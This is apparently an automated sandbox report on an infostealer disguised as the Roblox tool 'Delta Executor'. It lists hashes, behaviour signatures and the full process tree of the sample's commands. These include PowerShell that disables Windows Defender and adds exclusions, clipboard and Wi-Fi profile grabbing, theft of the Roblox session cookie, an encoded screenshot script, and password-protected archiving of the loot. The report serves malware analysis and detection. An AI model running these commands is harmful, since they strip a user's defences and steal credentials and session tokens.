Analysis
-
max time kernel
662s -
max time network
426s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
23-01-2025 09:07
General
-
Target
Delta Executor.exe
-
Size
6.9MB
-
MD5
b9a154faf6ea395cebef559c2704a45a
-
SHA1
9c30954379be499e8d2750d5f0fc7d1d3b4f58ba
-
SHA256
90db7abf08b6c82de3077609faa7f456e41cde437f4c1bc610898a86e95e4b0a
-
SHA512
fd65ec5498931e04da340eac8d8c4ee6b260e45e44abc5c04e5dd598d333b0c7c2f4165be019ba2261041daefa86e8f7be5dd37673d71ab05f8caf604da907b7
-
SSDEEP
98304:8cDjWM8JEE1FZG9amaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRiYRJJcGhEIG:8c0TXeNTfm/pf+xk4dWRimrbW3jmyT
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs
Using powershell.exe command.
-
Drops file in Drivers directory 9 IoCs
-
Clipboard Data 1 TTPs 6 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 7 IoCs
-
Loads dropped DLL 51 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 15 IoCs
-
Hide Artifacts: Hidden Files and Directories 1 TTPs 3 IoCs
-
UPX packed file 64 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 6 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 9 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Gathers system information 1 TTPs 3 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 36 IoCs
-
Modifies data under HKEY_USERS 3 IoCs
-
Runs ping.exe 1 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 48 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 9 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Delta Executor.exe"C:\Users\Admin\AppData\Local\Temp\Delta Executor.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Delta Executor.exe"C:\Users\Admin\AppData\Local\Temp\Delta Executor.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Delta Executor.exe'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Delta Executor.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please re execute the file!', 0, 'Delta Executor', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please re execute the file!', 0, 'Delta Executor', 0+16);close()"4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Delta Executor.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Delta Executor.exe"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o1q3ayv4\o1q3ayv4.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFE3.tmp" "c:\Users\Admin\AppData\Local\Temp\o1q3ayv4\CSCB7C0C4C6587C4ADBBAA2D839EB63BB7F.TMP"6⤵
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵
-
C:\Windows\system32\getmac.exegetmac4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI37322\rar.exe a -r -hp"Kizaki123" "C:\Users\Admin\AppData\Local\Temp\h9e7M.zip" *"3⤵
-
C:\Users\Admin\AppData\Local\Temp\_MEI37322\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI37322\rar.exe a -r -hp"Kizaki123" "C:\Users\Admin\AppData\Local\Temp\h9e7M.zip" *4⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
-
-
-
